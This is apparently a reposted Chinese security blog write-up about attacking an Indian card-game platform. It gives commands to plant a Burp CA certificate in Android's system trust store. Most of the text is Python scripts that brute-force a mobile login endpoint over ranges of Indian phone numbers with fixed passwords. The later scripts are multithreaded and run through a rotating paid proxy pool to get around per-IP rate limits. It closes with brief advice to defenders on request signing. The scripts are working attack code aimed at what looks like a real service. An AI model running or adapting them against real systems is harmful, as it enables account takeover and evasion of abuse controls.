-
-
用的xiaocms,阉割了前台的留言功能,导致无法实现后台csrf操作 -
可以暴力破解,但不知道用户名,被破解的概率很小 -
暂时没其他思路
-
openssl x509 -inform DER -in burp.cer -out burp.pem
openssl x509 -inform burp.pem -subject_hash_old burp.pem
将上面证书8位hash对pem进行重命名:burp.pem > 9a3b2a3e.0
将9a3b2a3e.0推送到安卓系统证书根目录:adb push 9a3b2a3e.0 /system/etc/security/cacerts/
adb shell chmod 644 /system/etc/security/cacerts/9a3b2a3e.0
adb shell chgrp root /system/etc/security/cacerts/9a3b2a3e.0
import requests
url = "https://aaaa.com/login/moblie"
for num in range(999999):
num_str = "{:06d}".format(num)
mobile = f"919840{num_str}"
data = {"mobile":mobile,"password":"abcd123456","ipInfo":{"status":"success"}}
try:
res = requests.post(url=url,json=data,timeout=5)
print(mobile+","+res.text)
except:
print("request failed")
nohup python3 mobile_brute.py > result.log 2>&1 &
import requests
from concurrent.futures import ThreadPoolExecutor
import datetime
def brute(start,end):
url = "https://target/user/login/mobile"
for num in range(start,end):
num_str = "{:06d}".format(num)
mobile = f"919840{num_str}"
data = {"mobileNo":mobile,"password":"a123456","ipInfo":{"status":"success"}}
try:
res = requests.post(url=url, json=data, proxies=proxies, timeout=10)
print(mobile+","+res.text)
except Exception as e:
print(mobile+str(e))
if __name__ == '__main__':
startime = datetime.datetime.now()
num = [{"start":1,"end":100000},{"start":100001,"end":200000},{"start":200001,"end":300000},{"start":300001,"end":400000},{"start":400001,"end":500000},
{"start":500001,"end":600000},{"start":600001,"end":700000},{"start":700001,"end":800000},{"start":800001,"end":900000},{"start":900001,"end":999999}]
with ThreadPoolExecutor(max_workers=10) as executor:
for i in range(10):
executor.submit(lambda cxp:brute(*cxp),(num[i].get('start'),num[i].get('end')))
endtime = datetime.datetime.now()
print(endtime-startime)
nohup python3 mobile_brute.py > result.log 2>&1 &
这显然有些不正常,拿了第一个success对应的手机号去APP里登录,919843558247,提示该手机号未注册。
代理的选择:调研了几家IP代理池商家,其中有几种代理模式:residential、datacenter、ISP,residential是私人家里的用的IP,datacenter是全球各地机房的IP。两种模式都有static和rotaing模式。对于我而言,能自动切换IP是最好的,所以选择了datacenter的rotaing模式,用的share共享代理池,性价比最高。
先尝试下能否动态切换IP代理
import requests
from concurrent.futures import ThreadPoolExecutor
import datetime
def brute(start,end):
proxy_user = "*********"
proxy_pass = "*****"
proxies = {"http": f"http://{proxy_user}:{proxy_pass}@pr.****.com:16666",
'https': f'http://{proxy_user}:{proxy_pass}@pr.****.com:16666'}
url = "https://target.com/user/login/mobile"
for num in range(start,end):
num_str = "{:05d}".format(num)
mobile = f"9198450{num_str}"
data = {"mobileNo":mobile,"password":"a123456","ipInfo":{"status":"success"}}
try:
res = requests.post(url=url, json=data, proxies=proxies, timeout=10)
text = mobile + "," + res.text
print(text)
except Exception as e:
timeout_mobile = mobile+",timeout"
print(timeout_mobile+","+str(e))
if __name__ == '__main__':
startime = datetime.datetime.now()
num = [{"start":1,"end":10000},{"start":10001,"end":20000},{"start":20001,"end":30000},{"start":30001,"end":40000},{"start":40001,"end":50000},
{"start":50001,"end":60000},{"start":60001,"end":70000},{"start":70001,"end":80000},{"start":80001,"end":90000},{"start":90001,"end":99999}]
with ThreadPoolExecutor(max_workers=4) as executor:
for i in range(10):
executor.submit(lambda cxp:brute(*cxp),(num[i].get('start'),num[i].get('end')))
endtime = datetime.datetime.now()
print(endtime-startime)
最后我想说的是,攻击和防御其实最重要的是投入产出比,过度投入成本防御并不一定好,ROI可能是负的。本次案例,我觉得对方做的策略就挺好,通过判断单个IP频繁请求来限制访问业务,攻击者就需要去买代理池,甚至为了提高产出率会加机器分布式去撞成本更高了。从甲方角度来说,这里其实可以做的更加安全一些,都不需要投入过多的投入成本,只需要对每个请求进行数字签名就ok,客户端加签逻辑代码、Hmac key做混淆,就需要攻击者花大量的时间成本去反编译客户端,有些加签功能还是通过加载.so动态进行的,要找到签名逻辑和密钥更加困难了。
原文始发于微信公众号(信息安全笔记):渗透印度棋牌游戏平台